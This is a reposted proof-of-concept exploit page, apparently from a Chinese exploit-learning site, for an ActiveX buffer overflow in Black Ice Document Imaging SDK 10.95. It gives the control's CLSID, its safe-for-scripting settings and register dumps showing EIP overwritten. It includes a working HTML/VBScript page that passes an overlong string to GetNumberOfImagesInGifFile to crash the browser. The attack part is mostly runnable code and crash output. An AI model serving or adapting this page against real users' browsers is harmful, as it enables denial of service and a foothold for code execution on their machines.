Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC
Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC
发布时间:2016-12-21 来源:查字典编辑
摘要:SubBoombuff=String(14356,"A")test.GetNumberOfImagesInGifFilebuffEndSub

<!--

Document Imaging SDK Buffer Overflow Vulnerability

DoS Proof of concept

Author: r0ut3r

Mail : writ3r [at] gmail.com

-----------------------------

-Tested on WinXP Pro SP2

Version: 10.95

Vendor : Black Ice Software

Price : $999

File : biimgfrm.ocx

CLSID: {79956462-F148-497F-B247-DF35A095F80B}

DLL Settings:

RegKey Safe for Script: True

RegKey Safe for Init : True

KillBitSet : False

Register:

EIP 7C91B3FB -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

EAX 001919C0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

EBX 41414141

ECX 00004141

EDX 00150168 -> 00000000

EDI 41414141

ESI 001919B8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

EBP 0013EA20 -> 0013EAA4

ESP 0013E804 -> 0000021A

-----------------------------

-->

<object classid='clsid:79956462-F148-497F-B247-DF35A095F80B' id='test'></object>

<script language='vbscript'>

Sub Boom

buff = String(14356, "A")

test.GetNumberOfImagesInGifFile buff

End Sub

</script>

<input type=button onclick=Boom() value='Boom?'>

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新Exploit学习
热门Exploit学习
网络安全子分类